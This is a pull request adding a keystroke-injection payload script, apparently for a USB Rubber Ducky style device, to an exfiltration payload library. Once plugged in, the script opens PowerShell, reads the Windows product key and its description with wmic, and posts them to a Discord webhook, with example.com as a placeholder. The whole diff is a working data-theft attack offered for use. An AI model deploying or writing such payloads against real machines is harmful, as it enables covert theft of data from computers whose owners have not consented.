### PR TITLE
Exfiltrate Windows Product Key

### DIFF
--- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
@@ -1,0 +1,59 @@
+REM ###################################################
+REM #                                                 |
+REM # Title        : Exfiltrate Windows Product Key   |
+REM # Author       : Aleff                            |
+REM # Version      : 1.0                              |
+REM # Category     : Exfiltration                     |
+REM # Target       : Windows 10-11                    |
+REM #                                                 |
+REM ###################################################
+
+
+REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
+DEFINE #DISCORD-WEBHOOK example.com
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+
+STRINGLN_BLOCK
+	$hookUrl = "#DISCORD-WEBHOOK"
+	$exfiltration = @"
+	$(wmic path softwarelicensingservice get OA3xOriginalProductKey)
+	$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription)
+	"@
+	$payload = [PSCustomObject]@{
+		content = $exfiltration
+	}
+	Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
+END_STRINGLN


### PR DESCRIPTION
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.